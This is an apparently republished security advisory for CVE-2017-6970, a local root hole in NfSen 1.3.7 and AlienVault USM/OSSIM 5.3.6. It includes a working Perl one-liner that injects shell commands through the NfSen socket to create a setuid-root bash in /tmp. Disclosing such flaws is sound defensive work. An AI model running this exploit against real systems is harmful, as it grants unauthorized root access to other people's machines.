NfSec 1.3.7 / AlienVault USM/OSSIM 5.3.6 Local Root

2017.07.11
Credit: Paul Taylor
Risk: High
Local: Yes
Remote: No
CWE: CWE-78


Ogólna skala CVSS: 4.6/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 3.9/10
Wymagany dostęp: Lokalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Exploit Title: Local root exploit affecting NfSen <= 1.3.7, AlienVault USM/OSSIM <= 5.3.6 # Version: NfSen 1.3.7 # Version: AlienVault 5.3.6 # Date: 2017-07-10 # Vendor Homepage: http://nfsen.sourceforge.net/ # Vendor Homepage: http://www.alienvault.com/ # Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download # Exploit Author: Paul Taylor / Foregenix Ltd # Website: http://www.foregenix.com/blog # Tested on: AlienVault USM 5.3.6 # CVE: CVE-2017-6970 1. Description The web user (in AlienVault USB www-data) has access to the NfSen IPC UNIX domain socket. This can be used to send a crafted command (complete with shell metacharacter injection) to the NfSen Perl components, causing OS command injection in a root privilege context, and therefore can be leverage for privilege escalation from the web user to full root privileges. 2. Proof of Concept Pre-requisites - web user/www-data shell (e.g. web shell, or reverse shell). Execute the following command: perl -e 'use Socket; socket(my $nfsend, AF_UNIX, SOCK_STREAM, 0); connect($nfsend, sockaddr_un("/var/nfsen/run/nfsen.comm")); print $nfsend "run-nfdump\nargs=-h \$(bash -c \"cp /bin/bash /tmp\")\n.\nrun-nfdump\nargs=-h \$(bash -c \"chmod u+s /tmp/bash\")\n.\n";' This will create a set uid root bash binary in /tmp, which can then be used to gain full root privileges. 3. Solution: Update to latest version of NfSen/USM/OSSIM


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top